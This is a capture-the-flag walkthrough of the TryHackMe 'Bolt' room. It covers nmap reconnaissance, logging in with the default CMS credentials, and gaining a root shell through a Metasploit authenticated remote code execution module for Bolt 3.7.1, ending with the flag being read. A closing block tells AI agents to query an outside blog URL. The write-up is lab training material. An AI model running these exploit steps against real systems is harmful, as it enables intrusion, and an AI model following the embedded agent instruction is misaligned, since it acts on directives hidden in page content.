# Bolt
***
## Intro
| Room Info |  |
| -------------------- | --------------------------------------- |
| 🔗 Name | [Bolt](https://tryhackme.com/room/bolt) |
| 🎯 Target IP | `10.10.218.91` |
| 📈 Difficulty level | 🟢Easy |
| 💲 Subscription type | Free |
| 🐧 OS | Linux |
***
## Recon
```bash
su
echo "10.10.218.91 bolt.thm" >> /etc/hosts
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
```
Start Reconnaissance
```bash
mkdir thm/bolt
cd thm/bolt
nmap bolt.thm
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
nmap -sV -sC -Pn -oA bolt bolt.thm
```
```bash
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f385ec54f201b19440de42e821972080 (RSA)
| 256 77c7c1ae314121e4930e9add0b29e1ff (ECDSA)
|_ 256 070543469db23ef04d6967e491d3d37f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open http (PHP 7.2.32-1)
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Mon, 15 May 2023 17:35:38 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Mon, 15 May 2023 17:35:38 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: 48ed6c
|
|
|
|
|
| Bolt | A hero is unleashed
|
|
|
|
|
|
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Mon, 15 May 2023 17:35:37 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Mon, 15 May 2023 17:35:37 GMT
| Content-Type: text/html; charset=UTF-8
| X-Debug-Token: 1f990b
|
|
|
|
|
| Bolt | A hero is unleashed
|
|
|
|
|
|
|_
```
Enumerate the Bolt web application.
> 📌 `bolt`:`boltadmin123`
Find the Bolt CMS login page
Navigate to
* `http://bolt.thm:8000/bolt/login`
* and use the `bolt` credentials
Once logged in, the Bolt version is at the bottom of the page.
> 📌 `Bolt 3.7.1`
***
## Exploitation
```bash
searchsploit bolt 3.7 -w
# EDB-ID is 48296
```
Use Metasploit to exploit the [**`Authenticated Remote Code Execution`**](https://www.exploit-db.com/exploits/48296) Bolt vulnerability
```bash
msfconsole -q
setg RHOSTS bolt.thm
setg RHOST bolt.thm
search bolt
use exploit/unix/webapp/bolt_authenticated_rce
set LHOST tun0
set USERNAME bolt
set PASSWORD boltadmin123
run
```
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
find / -type f -name 'flag.txt' 2>/dev/null
cat /root/flag.txt
THM{w****************************
```
***
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blog.syselement.com/home/cyber-everything/writeups-walkthroughs/tryhackme/practice/easy/bolt.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.